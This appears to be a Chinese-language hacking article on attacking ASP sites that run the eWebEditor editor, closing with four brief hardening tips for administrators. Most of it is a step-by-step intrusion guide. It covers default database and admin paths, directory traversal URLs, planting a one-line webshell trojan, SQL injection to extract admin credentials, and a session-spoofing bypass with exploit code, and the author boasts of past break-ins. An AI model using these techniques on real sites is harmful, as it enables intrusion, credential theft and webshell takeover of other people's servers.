ewebeditor 编辑器目前分为asp，aspx，php，jsp四种程序，各类ewebeditor版本很多，功能强大颇收使用者喜爱，在国内使用极为广泛。对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点：
　　默认，遍历目录漏洞，一句话，注入，构造，cookie欺骗，社工（踩脚印入侵），
　　NO1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb
　　默认的后台路径是admin/admin_login.asp
　　建议最好检测下admin/admin_style.asp文件是否可以直接访问
　　NO2.遍历目录漏洞（具体如下）：
　　登陆编辑器---上传文件管理---选择样式目录(随便选一个目录)
　　得到:
　　ewebeditor/admin_uploadfile.asp?id=14
　　在id=14后面添加&dir=..
　　再加 &dir=../..
　　&dir=../../../.. 看到整个网站文件了
　　此漏洞危害大大的，绝对恐怖
　　NO3.当数据库被管理员修改为asp、asa后缀的时候，可以插一句话木马服务端进入数据库，然后一句话木马客户端连接拿下webshell
　　NO4.有的时候爆了数据库找不到后台地址让人发急，其实可以试试查看样式表，有没别人加入的asp、asa后缀样式表，也就是虽说的踩着脚印入侵。
　　还有的时候聪明的管理员也就是加“#”不妨社工试试，我可没少占便宜的
　　例如:db/#ewebeditor.asa、db/#ewebeditor.asp 、db/#ewebeditor.mdb
　　NO5.有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
　　简单利用就是
　　http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
　　默认表名：eWebEditor_System默认列名：sys_UserName、sys_UserPass，然后利用nbsi进行猜解，对此进行注入取得账号密码
　　NO6.有的时候管理员不让复制样式，但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell，但是上传插入工具没有，又无法修改怎么办那？也许很多人说应该可以加工具栏，但是我就遇见过不让加的
　　这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下： (略)
　　NO.7还有种方式是最近坏客发现的
　　利用WebEditor session欺骗漏洞,进入后台:
　　漏洞文件:Admin_Private.asp
　　漏洞语句:
　　<%
　　If Session("eWebEditor_User") = "" Then
　　Response.Redirect "admin_login.asp"
　　Response.End
　　End If
　　只判断了session，没有判断cookies和路径的验证问题。
　　漏洞利用:
　　新建一个amxking.asp内容如下:
　　<%Session("eWebEditor_User") = "11111111"%>
　　访问amxking.asp，再访问后台任何文件，for example:Admin_Default.asp
　　面对此种威胁网站管理员应该做好如下的防范措施：
　　1、使用了eWebEditor编辑器的网站，应及时修改该编辑器的默认数据库路径和后缀名，建议数据库多方几层目录，防止数据库被黑客非法下载
　　2、修改编辑器后台登陆路径和默认的登陆用户名和密码，防止黑客进入后台管理界面
　　3、对Upload.asp语句进行修改,防止黑客利用其上传ASP木马从而获得WEB权限
　　4、及时对网站服务器IIS配置中的应用程序扩展名映射进行整理，确保其它类型的文件不能在服务器网站上运行。